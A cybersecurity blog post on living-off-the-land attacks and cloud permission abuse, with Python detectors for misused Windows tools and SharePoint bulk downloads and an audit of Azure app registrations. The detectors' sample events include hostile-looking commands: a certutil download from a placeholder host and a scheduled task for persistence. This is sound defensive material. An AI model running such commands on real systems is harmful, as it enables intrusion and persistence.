Beware of the Cloud Rustlers- Keeping Your Data Crop Safe

Welcome back to my weekly cyber security blog and I hope you all had a wonderful week. If there’s one thing that we all know, it’s that change takes time. The pace of technology change, especially with the rapid developments in AI, can be difficult to keep up with, but adopting new technology, whether personally or by integrating it with business processes, takes time. It was not that long ago that most businesses had a server room (or cupboard). When I first started in IT, I thought the server room was the coolest thing ever, and to this day I’m impressed when I see neatly organised, colour-coded rack cable management (you know what I mean). However, business, as they say, waits for no one. To meet changing business needs, we implement new technology and cloud services before our governance and processes have completely caught up. IT professionals who work with on-premises technology will be familiar with over-permissioned applications: the vendor says “oh, just give it admin permissions and it will work”, or the documentation says everything on the server needs high-level permissions to work. Dare I say it, for poorly written software this is sometimes required, even though it provides an avenue for hackers to find a way in and steal our data. However, now we have cloud technology, so that’s not a problem anymore, right… Unfortunately my friends, to use another cliché, old habits die hard. Not only do we have cloud applications with issues of their own (for example, not implementing authentication correctly, not implementing multifactor authentication at all, or charging extra for it, or not implementing encryption correctly), we still have excessive permissions.
It is a selling point for new cloud applications that they can integrate with our existing major cloud platforms like Microsoft 365 or Salesforce. However, I am seeing more cases where the permissions they require in those platforms are excessive and potentially leave the door open for threat actors to use them in unintended ways. So, this week, we explore how attackers can rain on our day from our own cloud.

From stone walls to firewalls

Since the 1990s we have had antivirus software installed to protect our computers, and traditional antivirus has always needed daily updates to ensure it could recognise the latest threats. However, that traditional approach does not work anymore. First, there are just too many malicious programs now: information assembled by Stationx reveals there are over 1.2 billion known malicious programs and scripts, and in 2023 threat actors deployed over 200,000 more per day, or about 1.5 per minute. In recent years, viruses (malware) have not been our only threat. The attacker’s problem with malware is that it can be detected by our security systems. A better way for threat actors to get our stuff (especially from cloud systems like Azure, AWS and Salesforce) is to use our own tools against us. We call this Living off the Land (LOTL).

Essentially, an LOTL attack works by abusing the legitimate tools and services already on a system. These are attractive for the bad guys to abuse because they’re already there and, being a legitimate part of the system, they won’t be detected by antivirus software. On Windows there are over 130 legitimate Microsoft programs (listed here) that can be abused, from the certificate management utility, which can download files from the internet, to the Control Panel, which can run malicious files, to the Task Scheduler, which attackers use to regain access after every reboot.
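Because these programs cannot be blocked, the practical defence is to watch how they are used. The following is an added illustration (not code from the original post) of the kind of rule a monitoring platform applies to process-creation events for the three tools named above: the certificate utility being handed a URL, the Control Panel being handed something other than a .cpl applet, and a scheduled task being created from a shell. The `ProcessEvent` record and the sample events are constructed, simplified stand-ins for a Sysmon or EDR log, not a real log format.

```python
"""Flag suspicious use of built-in Windows tools (living off the land) in process-creation events.

Added illustration: ProcessEvent is a simplified, constructed stand-in for a
Sysmon or EDR process-creation record, not a real log format.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process
    user: str           # account the process runs as


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _argument_extensions(command_line: str) -> set:
    """File extensions found in the arguments (the first token, the program itself, is skipped)."""
    parts = command_line.split(None, 1)
    args = parts[1] if len(parts) == 2 else ""
    return {m.lower() for m in re.findall(r'\.([A-Za-z0-9]{1,5})(?=[\s"\']|$)', args)}


def certutil_download(e: ProcessEvent) -> bool:
    """certutil manages certificates; a URL on its command line means it is acting as a downloader."""
    return _name(e.image) == "certutil.exe" and re.search(r"https?://", e.command_line, re.I) is not None


def control_panel_non_cpl(e: ProcessEvent) -> bool:
    """control.exe normally opens a .cpl applet; any other file type handed to it deserves a look."""
    return _name(e.image) == "control.exe" and bool(_argument_extensions(e.command_line) - {"cpl"})


def task_created_from_shell(e: ProcessEvent) -> bool:
    """A scheduled task created by a shell or script host is a common way to survive reboots."""
    return (_name(e.image) == "schtasks.exe"
            and "/create" in e.command_line.lower()
            and _name(e.parent_image) in {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"})


RULES = [
    ("certutil used to fetch content from a URL", "high", certutil_download),
    ("control.exe given a non-.cpl file", "high", control_panel_non_cpl),
    ("scheduled task created from a shell", "medium", task_created_from_shell),
]


def scan(events):
    """Run every rule over every event; return one finding per (event, rule) match."""
    findings = []
    for e in events:
        for title, severity, predicate in RULES:
            if predicate(e):
                findings.append({"rule": title, "severity": severity,
                                 "user": e.user, "command_line": e.command_line})
    return findings


# Constructed sample events: three benign administrative uses, three that warrant investigation.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -f http://files.example.invalid/update.txt C:\Users\Public\update.txt",
                 r"C:\Windows\System32\cmd.exe", r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify C:\certs\server.cer",
                 r"C:\Windows\System32\cmd.exe", r"CORP\itadmin"),
    ProcessEvent(r"C:\Windows\System32\control.exe",
                 r"control.exe C:\Users\Public\report.dll",
                 r"C:\Windows\explorer.exe", r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\System32\control.exe",
                 r"control.exe timedate.cpl",
                 r"C:\Windows\explorer.exe", r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r"schtasks.exe /create /tn Updater /sc onlogon /tr C:\Users\Public\update.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r"schtasks.exe /query /tn Updater",
                 r"C:\Windows\System32\cmd.exe", r"CORP\itadmin"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']}: {f['user']} ran {f['command_line']}")
```

The point of the rules is context rather than the program name: the same certutil.exe that verifies a certificate is benign, and only the combination of tool, arguments and parent process separates routine administration from a hunt lead.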

I know what you did last summer

Since ChatGPT burst into our lives, the development of AI has accelerated exponentially. Recently Microsoft announced Windows Recall, a new feature in their upcoming Copilot+ PCs, which are laptops featuring dedicated AI hardware (a Neural Processing Unit or NPU). This will allow the user to search back over everything they’ve done on their computer in the last 3 months: every document, every program, every website. We can look for that thing we did that we can’t quite remember. I can see how this would be useful, along with the potential security risk. Recall will work by taking a screenshot of the PC every 5 seconds, which onboard AI will analyse and make searchable. Microsoft have said that a key safeguard is that this data will be encrypted and only stored locally. However, Recall will not redact text, meaning any passwords or confidential data on screen will be recorded and be searchable. Unfortunately, I believe this will open a whole new avenue for threat actors to live off the land. With Recall, all hackers need to do is compromise an individual’s credentials and they have access to their Recall and all that person’s historical activity.

Oh no, not my cloud

The glue that holds cloud environments together is called the Application Programming Interface or API. These are the background services which move data in and out of the cloud, and for this post I am going to focus on the Microsoft Graph API. Everyone who uses Microsoft 365 or Azure is using the Graph API in the background every day. It interacts with and sends data to/from every service running in the Microsoft cloud. As the entire Microsoft ecosystem is linked together by the Graph API, even the most advanced security platforms expect to see it being used. So, if an attacker is abusing it, it is very difficult to detect what they’re doing.

Here is a great technical example where Daniel Chronlund demonstrates how common API permissions can be abused to steal data from SharePoint Online. He uses standard application permissions to find and download the content of all of a company’s SharePoint document libraries. The key points to highlight here are that he’s using legitimate permissions and services, that it can be done completely remotely, and that there’s no malware involved, so even if this were being done from your own PC, it’s still unlikely to be detected by antivirus. Earlier this year, Varonis Threat Labs outlined another attack where SharePoint access is abused to secretly steal cloud files, disguising them as file synchronisation to hide from security systems. As these attacks are against the public cloud, all the threat actor needs to do is steal legitimate credentials and they can do all this remotely, from anywhere in the world.
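Both attacks use operations that a security platform sees every day, so what gives them away is volume and spread, not the operation itself. As an added illustration (not code from the original post or from either of the researchers mentioned), the script below looks for an identity that downloads far more files, from far more document libraries, in a ten-minute window than it normally does, and it deliberately counts sync-style downloads alongside ordinary ones so that theft disguised as synchronisation is not excluded. The log lines and the per-identity baseline are constructed; the shape is a simplified version of what the Microsoft 365 unified audit log provides, where SharePoint events carry operations such as `FileDownloaded` and `FileSyncDownloadedFull`.

```python
"""Spot bulk SharePoint Online downloads, including ones disguised as sync traffic.

Added illustration. The log lines below are constructed and simplified; a real
feed would be the Microsoft 365 unified audit log, whose SharePoint events carry
operations such as FileDownloaded and FileSyncDownloadedFull among many other fields.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Operations that move file content to the client. Sync downloads count too, because
# bulk theft can be dressed up as a OneDrive sync session to look routine.
DOWNLOAD_OPERATIONS = {"FileDownloaded", "FileSyncDownloadedFull"}

WINDOW = timedelta(minutes=10)
MIN_FILES = 50        # absolute floor before any window is considered
MIN_SITES = 3         # one identity touching many document libraries at once is unusual
BASELINE_FACTOR = 5   # or far above this identity's normal volume for one window
DEFAULT_BASELINE = 5  # assumed for identities with no history (treat them conservatively)


def parse_records(lines):
    """Parse 'time,actor,operation,site,object' lines into dicts with a datetime."""
    records = []
    for line in lines:
        t, actor, op, site, obj = line.strip().split(",", 4)
        records.append({"time": datetime.fromisoformat(t), "actor": actor,
                        "operation": op, "site": site, "object": obj})
    return records


def detect_bulk_downloads(records, baseline):
    """Return, per actor, the worst WINDOW whose downloads exceed the thresholds.

    baseline maps actor -> typical downloads per WINDOW; here it is constructed,
    in practice it would be learned from weeks of that actor's history."""
    per_actor = defaultdict(list)
    for r in records:
        if r["operation"] in DOWNLOAD_OPERATIONS:
            per_actor[r["actor"]].append(r)

    findings = []
    for actor, evs in per_actor.items():
        evs.sort(key=lambda r: r["time"])
        normal = baseline.get(actor, DEFAULT_BASELINE)
        worst, start = None, 0
        for end in range(len(evs)):
            # slide the window start forward until the window spans at most WINDOW
            while evs[end]["time"] - evs[start]["time"] > WINDOW:
                start += 1
            window = evs[start:end + 1]
            files = {r["object"] for r in window}
            sites = {r["site"] for r in window}
            suspicious = len(files) >= MIN_FILES and (
                len(sites) >= MIN_SITES or len(files) > BASELINE_FACTOR * normal)
            if suspicious and (worst is None or len(files) > worst["files"]):
                worst = {"actor": actor, "files": len(files), "sites": len(sites),
                         "ops": sorted({r["operation"] for r in window}),
                         "start": window[0]["time"].isoformat()}
        if worst:
            findings.append(worst)
    return findings


def _constructed_log():
    """Build a small audit log: one normal user and one application identity emptying four libraries."""
    t0 = datetime(2024, 6, 3, 9, 0, 0)
    lines = []
    for i in range(12):  # Alice: a dozen downloads spread over three hours, all from Finance
        t = (t0 + timedelta(minutes=15 * i)).isoformat()
        lines.append(f"{t},alice@example.invalid,FileDownloaded,/sites/Finance,/sites/Finance/Shared Documents/report{i}.xlsx")
    sites = ["/sites/Finance", "/sites/HR", "/sites/Legal", "/sites/Board"]
    for i in range(120):  # an app identity: 120 files from four sites in six minutes, reported as sync
        t = (t0 + timedelta(seconds=3 * i)).isoformat()
        lines.append(f"{t},app:ContractReviewAddin,FileSyncDownloadedFull,{sites[i % 4]},{sites[i % 4]}/Shared Documents/doc{i}.docx")
    return lines


SAMPLE_LOG = _constructed_log()
BASELINE = {"alice@example.invalid": 3}  # constructed: three downloads per window is normal for Alice

if __name__ == "__main__":
    for f in detect_bulk_downloads(parse_records(SAMPLE_LOG), BASELINE):
        print(f"{f['actor']}: {f['files']} files from {f['sites']} sites starting {f['start']} via {', '.join(f['ops'])}")
```

Alice never trips the rule, while the application identity does on both counts (four libraries, and dozens of times its assumed baseline), even though every one of its operations is individually legitimate. The thresholds are starting points; a real deployment tunes them per tenant and per identity type.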

All together now

I’ve listed some of the problems, but let’s talk about what we can do to protect ourselves. Partly this comes down to basic cyber hygiene (as most things do) and partly to careful monitoring. Living off the land attacks are hard to defend against as they use legitimate tools and services against us. We can’t block them, as we need them for our systems to work, but we can monitor them.

Although traditional security tools will not help us here, AI can really give cyber defenders an edge. Modern monitoring platforms use AI to monitor both our on-premises and cloud platforms to identify legitimate tools behaving in unusual ways which could indicate an active attack. For most companies, I would recommend outsourcing this to a managed security services partner (MSSP) who can monitor 24x7.

Cyber hygiene is also vital: it is common for new products being integrated into our Azure cloud tenancy either to be given too many permissions, or for those permissions to be left behind when the products are retired.

There are three hygiene rules that all companies should follow.

  1. Application Administrators – Carefully control who can add apps to your Azure, this can easily get out of control, leading to lots of extra unmonitored permissions.
  2. Multifactor Authentication – Make sure all your apps require multifactor authentication to access, don’t make it easy for the bad guys.
  3. Secrets – Your application secrets are the same as passwords, keep them safe and locked away.
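Rules 1 and 3 can be checked mechanically against the list of app registrations in the tenant. The script below is an added illustration (not code from the original post) of such an audit: it flags apps holding tenant-wide application permissions, apps with no owner, apps that have not signed in for 90 days (the left-behind permissions mentioned above), and secrets that are expired or were issued for longer than a year. The inventory shape is a constructed simplification; in practice the data would come from Microsoft Graph (the `/applications` and `/servicePrincipals` endpoints) or a portal export. The permission names are real Microsoft Graph application permissions. Rule 2 is not something to script here: multifactor authentication for app access is enforced through Conditional Access policy rather than per-app settings.

```python
"""Audit Entra ID (Azure AD) app registrations against the hygiene rules.

Added illustration. INVENTORY is a constructed, simplified shape; in practice it
would be built from Microsoft Graph (/applications, /servicePrincipals) or a
portal export. The permission names are real Graph application permissions.
"""
from datetime import date, timedelta

TODAY = date(2024, 6, 3)  # fixed so the example is reproducible

# Application (app-only) permissions that grant tenant-wide access with no signed-in user.
HIGH_PRIVILEGE = {
    "Sites.FullControl.All", "Sites.Read.All", "Sites.ReadWrite.All",
    "Files.Read.All", "Files.ReadWrite.All",
    "Mail.Read", "Mail.ReadWrite",
    "Directory.ReadWrite.All", "Application.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
}
STALE_AFTER = timedelta(days=90)         # no sign-in for this long: candidate for removal
MAX_SECRET_LIFETIME = timedelta(days=365)  # treat a secret like a password: rotate it

# Constructed inventory: one live add-in with a lapsed secret, one retired product still
# holding a directory-wide permission, and one well-kept app.
INVENTORY = [
    {
        "name": "Contract Review Add-in",
        "owners": ["it.admin@example.invalid"],
        "app_permissions": ["Sites.Read.All", "User.Read.All"],
        "secrets": [{"created": "2022-01-10", "expires": "2024-01-10"}],
        "last_sign_in": "2024-06-01",
    },
    {
        "name": "Old HR Sync (retired 2023)",
        "owners": [],
        "app_permissions": ["Directory.ReadWrite.All"],
        "secrets": [{"created": "2023-02-01", "expires": "2025-02-01"}],
        "last_sign_in": "2023-09-14",
    },
    {
        "name": "Helpdesk Dashboard",
        "owners": ["it.admin@example.invalid"],
        "app_permissions": ["User.Read.All"],
        "secrets": [{"created": "2024-03-01", "expires": "2024-09-01"}],
        "last_sign_in": "2024-06-02",
    },
]


def audit(inventory, today=TODAY):
    """Return (app name, finding) pairs for every hygiene rule an app breaks."""
    findings = []
    for app in inventory:
        name = app["name"]

        risky = sorted(set(app["app_permissions"]) & HIGH_PRIVILEGE)
        if risky:
            findings.append((name, "high-privilege application permissions: " + ", ".join(risky)))

        if not app["owners"]:
            findings.append((name, "no owner: nobody is accountable for its permissions"))

        last = date.fromisoformat(app["last_sign_in"])
        if today - last > STALE_AFTER:
            findings.append((name, f"no sign-in for {(today - last).days} days: retire it and remove its permissions"))

        for s in app["secrets"]:
            created = date.fromisoformat(s["created"])
            expires = date.fromisoformat(s["expires"])
            if expires < today:
                findings.append((name, f"expired secret (expired {expires}) still registered"))
            elif expires - created > MAX_SECRET_LIFETIME:
                findings.append((name, f"secret lifetime of {(expires - created).days} days exceeds policy"))
    return findings


if __name__ == "__main__":
    for name, finding in audit(INVENTORY):
        print(f"{name}: {finding}")
```

Run regularly, a report like this turns the hygiene rules from good intentions into a list of apps to fix or delete, and it is the retired app with a directory-wide permission and no owner that should worry you most.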

We hear so much about ransomware and other forms of malware, but cyber-attacks come in many forms. Threat actors are always looking for new ways to steal our stuff without being caught. Living off the land is an increasingly common and subtle technique which is difficult to defend against. Our best defence is a good offence. We must have the right tools in place to monitor our technology estate (cloud and on-premises) to look for programs behaving badly, and we need to think carefully about what we allow into our cloud; after all, as we’ve seen, even good programs can go rogue.

I believe in our cyber security community and that by sharing and helping each other we can all be safer. So, everything above is just my opinion, what’s yours? Please share in the comments below and stay safe.
